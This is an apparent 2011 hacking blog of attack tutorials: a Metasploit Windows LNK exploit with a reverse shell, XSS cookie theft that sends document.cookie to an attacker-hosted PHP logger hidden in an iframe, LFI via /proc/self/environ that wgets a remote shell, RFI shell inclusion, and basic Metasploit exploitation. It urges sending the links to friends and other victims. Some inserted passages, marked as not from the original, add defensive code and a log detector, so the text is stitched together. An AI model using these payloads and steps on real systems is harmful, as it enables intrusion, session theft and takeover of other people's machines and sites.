Tuesday, October 25, 2011

Windows lnk Exploit


Hack the system using the Windows LNK exploit:

Update Metasploit.
Go to the prompt and change into the framework directory.

Then type:

#./msfconsole

The msf> prompt opens.

Then search for the Windows LNK exploit:

msf>search lnk

It shows the exploit:

exploit/xxxxx/xxxxxr/xxxxx_dllloader

then type:
msf>use exploitname (the exploit shown above)

Set SRVHOST to your local IP. That is the address the malicious shortcut is served from, so it has to be reachable by the target.

Then set the payload.

A reverse_tcp payload usually works best, because the victim connects out to you instead of you having to reach an inbound port on the victim.

so type:

msf>set payload windows/metxxxxx/xxx_tcp
then set LHOST to your local IP (the address the reverse connection comes back to)

then type:

msf>exploit

You will be shown a URL or address with a port number. Send it to your friend. When they open it, Windows parses the shortcut and loads the DLL it points to while rendering the icon, and that runs your payload.
Tada!
Wait for the reverse connection.
---------------------------------------------------
Warning: I'm not responsible for your actions; this is for educational purposes only.

Cookie Grabbing using XSS


XSS, or Cross-site Scripting, is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users.

There are two types of XSS: Non-Persistent (reflected) and Persistent (stored).
If you need to know about persistent and non-persistent XSS, click here.

Now..
Search for a vulnerability in a site: that part is on you.
A simple test payload is:
<script>alert("hi");</script>


Make sure that you have a site where the cookie can be uploaded
(where the link has to be sent to and where the script executes).
Upload the PHP script below to your site, e.g. as 1.php:

<?php
// Cookie logger: the XSS payload redirects the victim here with the
// cookie string in the "cookie" query parameter.
$cookie = $_GET['cookie'] ?? '';    // the victim's cookies, as sent by the payload
$file = fopen("cookies.txt", "a");  // open cookies.txt in append mode
fwrite($file, $cookie . "\n\n\n");  // one entry per victim, separated by blank lines
fclose($file);
?>

Save it as 1.php.

Now the URL looks like: www.your_site.com/some_folder/1.php

Find the vuln in a site and then put it like this:

http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>

Now send this link, but most people won't click it because the URL looks very suspicious.
So you need to mask it.

Ex:

<iframe src="http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>" width="1" height="1"></iframe>

Now put this in a file called iclick.php.

Now your URL looks like www.your_site.com/folder/iclick.php

Send this link to your friend or anyone else and ask them (social engineer) to click on it.
That's it; the cookies will be stored in the cookies.txt file.
(Download a cookie editor addon and go on with whatever you want to do.)
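The payload above only works because search.php puts the query parameter straight into the HTML. As an added example (not code from the original post), here is what such a vulnerable page looks like beside a hardened version. The file name search.php and the parameter name query are the post's; the function names and the HttpOnly session setup are assumptions for illustration.

```php
<?php
// Added example (not from the original post): the reflected XSS that the
// cookie-grabbing payload relies on, next to a hardened version.
// Names other than search.php / query are assumptions for illustration.

// VULNERABLE: echoes the raw query parameter into the HTML body.
function render_search_vulnerable(string $query): string
{
    return "<p>Results for: " . $query . "</p>";
}

// HARDENED: HTML-encode untrusted input for the HTML body context.
// ENT_QUOTES also encodes ' so the value is safe inside quoted attributes;
// the charset argument keeps the encoder from being confused by bad UTF-8.
function render_search_hardened(string $query): string
{
    $safe = htmlspecialchars($query, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>Results for: " . $safe . "</p>";
}

// Second layer: mark the session cookie HttpOnly so document.cookie cannot
// read it even if an injection slips through. Must run before any output.
function start_session_hardened(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,   // assumption: the site is served over HTTPS
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Demonstration on the post's payload (run with: php this_file.php).
if (PHP_SAPI === 'cli') {
    $payload = "<script>document.location='http://Your_site.com/somefolder/1.php?cookie='"
             . ".concat(escape(document.cookie));</script>";
    echo render_search_vulnerable($payload), "\n"; // <script> tag lands in the page intact
    echo render_search_hardened($payload), "\n";   // &lt;script&gt;... shown as text
}
```

Run it with php on the command line: the vulnerable function returns the script tag untouched, the hardened one returns it entity-encoded so the browser displays it as text. With HttpOnly set, the document.cookie in the payload would not even see the session cookie, so cookies.txt would stay empty even on an unpatched page.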
-------------------------------------------------

Warning: *** I'm not responsible for your actions. This is for educational purposes only.

Tuesday, October 18, 2011

LFI (Local File Inclusion)


LFI bounce using chunked transfer encoding


Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized and allows directory traversal characters to be injected.
The vulnerable code looks like:

<?php
   $file = $_GET['file'];
   if(isset($file))
   {
       include("pages/$file");
   }
   else
   ……….
    ……..       
?>

From the code you can see that it includes whatever file name the user supplies from the local filesystem, only prefixed with pages/ and with no validation at all.
To find LFI vuln sites use a dork like: inurl:php?id=*.php
The "*.php" means any file name with the extension .php.
Ex: inurl:php?page=contact.php, contactus.php etc.
Or inurl:.php?file=somefile.php
(* im not Responsible for any of the actions for what you do , Just Educational purpose only)
There are two ways: manual and automated.

MANUAL way for LFI:

/proc/self/environ method:

Check for a vuln site the same way as above.

Then:

Now let's check for /etc/passwd to see whether it is vulnerable to Local File Inclusion. Let's make a request:

http://www.website.com/view.php?page=../etc/passwd

We get an error and no /etc/passwd file.

* So we go more directories up (each ../ climbs one directory; keep adding them until the path escapes the web root):

http://www.website.com/view.php?page=../../etc/passwd

If the contents of the password file show up in the page, we successfully included the /etc/passwd file.

Then check for /proc/self/environ (in place of /etc/passwd); we get a page showing the process environment.

Then we need the Tamper Data addon for Firefox:

Choose Tamper and in the User-Agent field write the following code:

<?system('wget http://site.com/shel.txt -O shel.php');?>

Then submit the request.

(* here shel.txt must contain the shell code, which we fetch from another site with the wget command *)

This works because /proc/self/environ holds the environment of the process handling the request, including the HTTP_USER_AGENT value, so when the page include()s that file the PHP code in the header gets executed.

Tada! Shell uploaded.

Warning: I am not responsible for your actions, please be careful. This is for educational purposes only.
--------------------------------------------------------------------------------

Automated:

Now remove the file name in the URL and replace it with ../ (without quotes).
If you get an error like:

Warning: include_once(../) [function.include-once]: failed to open stream: Inappropriate ioctl for device in /home/sitename/public_html/index.php on line 10

Warning: include_once() [function.include]: Failed opening '../' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/sitename/public_html/index.php on line 10


it is vulnerable to LFI (the error also leaks the full path of the script, which helps later).


Now to attack:
You need a Python script called fimap, which can be downloaded via Google.
You need Python installed to execute it.

Open a command prompt, go to the folder where fimap.py is present and type:

fimap.py -u "http://www.site.com/file.php?page=file.php"

(-u: test a single URL to see whether the vuln exists or not)

It tests whether a file can be injected where it is vulnerable; the output looks like this:



At the bottom of the output you can see: "[1] /proc/self/environ"
followed by 0 (0 = clean/readable, 1 = writable).

Now to exploit, type:

fimap.py -x "http://www.site.com/file.php?page=file.php"

(-x: exploit; -u: scan for vuln).

Now you will find something like this:



Choose the domain; you need to choose a number here, my option is "9". fimap stores the history of successfully exploited targets, so choose the number corresponding to the domain you scanned.
After that it asks you to choose the vulnerable script (choose the number; if there is only one script, type 1).

Then it asks for the type of attack available:

1. spawn fimap shell

2. pentest monkey reverse shell

Select option 1.

It will inject successfully.

Tada! You get a command prompt on the host.

(For the pentest monkey shell you need netcat listening on an open port to get the connection back.)
Warning: I am not responsible for your actions, please be careful. This is for educational purposes only.
You will hardly find LFI vuln sites; you have to work hard to find them.
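The requests this post teaches you to send (and the remote-URL include from the RFI post below) leave a clear fingerprint in the web server's access log. As an added example (not code from the original post), here is a small PHP CLI script that flags them. The regexes, the category names and the log lines are constructed for illustration and are not taken from any real server.

```php
<?php
// Added example (not from the original post): flag LFI/RFI probes in
// Apache combined-format access log lines. Patterns and sample lines are
// constructed for illustration.

const PROBE_PATTERNS = [
    'traversal'      => '~(?:\.\./|\.\.%2f|%2e%2e/|%2e%2e%2f)~i',   // ../ in any encoding
    'proc_environ'   => '~/proc/self/environ~i',                    // the /proc/self/environ trick
    'etc_passwd'     => '~/etc/passwd~i',                           // classic LFI canary file
    'remote_include' => '~[?&][a-z_]+=(?:https?|ftp)(?::|%3a)~i',   // param=http://... (RFI)
    'php_in_ua'      => '~"[^"]*<\?(?:php)?[^"]*"$~i',              // PHP tag in the User-Agent field
    'null_byte'      => '~%00~',                                    // old-style extension truncation
];

// Returns the list of pattern names that match one log line.
function classify_log_line(string $line): array
{
    $hits = [];
    foreach (PROBE_PATTERNS as $name => $re) {
        if (preg_match($re, $line)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Returns [line index => [hits...]] for every suspicious line.
function scan_log(array $lines): array
{
    $report = [];
    foreach ($lines as $i => $line) {
        $hits = classify_log_line($line);
        if ($hits) {
            $report[$i] = $hits;
        }
    }
    return $report;
}

// Constructed sample lines (not real traffic): one benign request, the
// /etc/passwd and /proc/self/environ probes from this post, and the RFI probe.
$sample = [
    '10.0.0.5 - - [18/Oct/2011:10:01:02 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/Oct/2011:10:01:09 +0000] "GET /view.php?page=../../etc/passwd HTTP/1.1" 200 1890 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/Oct/2011:10:01:15 +0000] "GET /view.php?page=../../proc/self/environ HTTP/1.1" 200 2200 "-" "<?system(\'wget http://site.com/shel.txt -O shel.php\');?>"',
    '10.0.0.12 - - [17/Oct/2011:09:30:00 +0000] "GET /file.php?page=http://www.Your_site.com/shell.txt HTTP/1.1" 200 4096 "-" "curl/7.21"',
];

if (PHP_SAPI === 'cli') {
    foreach (scan_log($sample) as $i => $hits) {
        echo "line $i: ", implode(', ', $hits), "\n";
    }
}
```

On the sample above line 0 is silent, line 1 reports traversal and etc_passwd, line 2 reports traversal, proc_environ and php_in_ua, and line 3 reports remote_include. The User-Agent check is the one worth keeping on a real server: a PHP open tag has no business in a browser identification string.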
--------------------------------------------------------------------------------------------------------

Monday, October 17, 2011

RFI (Remote File Inclusion)


Remote File Inclusion (RFI) is a type of vulnerability found in some websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to code execution on the web server.
The main cause is the use of unvalidated external variables, most notably in the include statement. In PHP the remote fetch also needs allow_url_include turned on (it is off by default), which is one reason RFI is rare today.
The vuln. Code looks like:       

<?php
  include($_GET['page']);
?>
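The include($_GET['page']) above and the include("pages/$file") in the LFI post share one root cause: the request parameter becomes part of a path (or a URL). As an added example (not code from either post), here is that pattern beside a hardened version that maps the parameter to an allowlist, plus a path-canonicalisation check for cases where a dynamic file name cannot be avoided. The parameter name page, the pages/ directory and the file names under it are assumptions for illustration.

```php
<?php
// Added example (not from the original posts): the include() pattern the
// LFI and RFI posts describe, beside a hardened version. Directory and file
// names are assumptions for illustration.

// VULNERABLE (LFI): ../ in $file walks out of pages/.
// VULNERABLE (RFI): with allow_url_include=On, an http:// value is fetched and run.
function include_vulnerable(string $file): void
{
    include("pages/$file");
}

// HARDENED: the user never supplies a path, only a key into a fixed table.
// Anything not in the table (traversal, URLs, /proc/self/environ) is rejected.
function resolve_page(string $page): ?string
{
    $allowed = [
        'home'    => 'pages/home.php',
        'contact' => 'pages/contact.php',
        'about'   => 'pages/about.php',
    ];
    return $allowed[$page] ?? null;
}

// Defence in depth if a dynamic file name is unavoidable: canonicalise and
// confirm the result still lives inside the intended directory.
function safe_path(string $baseDir, string $file): ?string
{
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $real === false) {
        return null;   // base missing, or target does not exist / cannot be resolved
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;   // resolved outside pages/, e.g. ../../etc/passwd
    }
    return $real;
}

function include_hardened(string $page): void
{
    $target = resolve_page($page);
    if ($target === null) {
        http_response_code(404);
        return;
    }
    include($target);
}

// Server-side setting that closes the RFI side regardless of the code:
// php.ini -> allow_url_include = Off (the default).

if (PHP_SAPI === 'cli') {
    $probes = ['contact', '../../etc/passwd', '../../proc/self/environ',
               'http://www.Your_site.com/shell.txt'];
    foreach ($probes as $p) {
        printf("%-38s -> %s\n", $p, resolve_page($p) ?? 'rejected');
    }
}
```

The CLI demo only exercises resolve_page, because safe_path needs a real pages/ directory on disk to canonicalise against; only the first probe maps to a file, the other three are rejected.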
 

To attack, search for a site:
Example using the Google dork inurl:php?page= ; the URL should look something like:
www.site.com/somefile.php?page=http://www.somesite.com
Well, we won't find RFI vuln sites these days; you may find 1 or 2 in a million, or maybe none. This is for educational purposes only, but I will explain it with screenshots.

Step 1: find the vuln site.
Then place ../ at the end of the URL (remove the content in page=) like this:
Ex: www.site.com/somefile.php?page=../

If it shows some kind of error like:

Warning: file(../) [function.file]: failed to open stream: Permission denied in \\systemname\users\ in line.


then it is vuln to RFI.
Sometimes, if you are lucky, you can directly check by inserting another URL (it needs the http:// scheme, otherwise PHP treats it as a local path).
Ex: www.site.com/file.php?page=http://www.google.com

That's it. Now to take over this site all you need is a SHELL. A shell is like an unauthorized backdoor control panel of the website, and it should have the .txt extension so the server you host it on sends the source as plain text instead of executing it; the vulnerable include() on the target then runs it.

(* I'm not responsible for any of your actions, for educational purposes only. *)

Now put it in the URL like: www.site.com/file.php?page=http://www.Your_site.com/shell.txt

This shell.txt comes from another site which you have already hacked and uploaded the txt file to.

You will see something like this: tada!



Saturday, October 15, 2011

Metasploit Basic exploiting for new Starters




SCANNED WITH NESSUS:
IP: 192.168.*.*

Number of vulnerabilities:
Open ports: 29
High: 300
Medium: 47
Low: 77

Remote host information
Operating System: Microsoft Windows Server (English)

Synopsis:
The remote host seems to be a VMware virtual machine.

Description:
According to the MAC address of its network adapter, the remote host is a VMware virtual machine.

LIST OF OPEN PORTS:



TESTING WITH FRAMEWORK:
Ex:
Go to the Metasploit framework.
I've chosen port 445 since it has got a high number of vulnerabilities.


Now we choose the vulnerability with id: 19408.
Now we go to the framework and search for the exploit corresponding to the above vulnerability.

 

We choose the above exploit:
Ex:


Now type >show options to see whether the target host (RHOST) is set or not.

 

As you can see there is no target host set, so now we set it below:




The TARGET option should be set to 0, as that entry is listed as working against Windows 2***:


---------------------------------------------
Now we select the payload:
To see the payloads type:
>show payloads
To set the payload see below:

To see whether our local IP or host is set or not, type:
>show options
You will see this:



As you can observe, LHOST is not set; that is our local IP.
To set it, type:

>set LHOST <host ip>

Now type
>exploit


Hurray!
You will get the target host's command shell.
Enjoy!
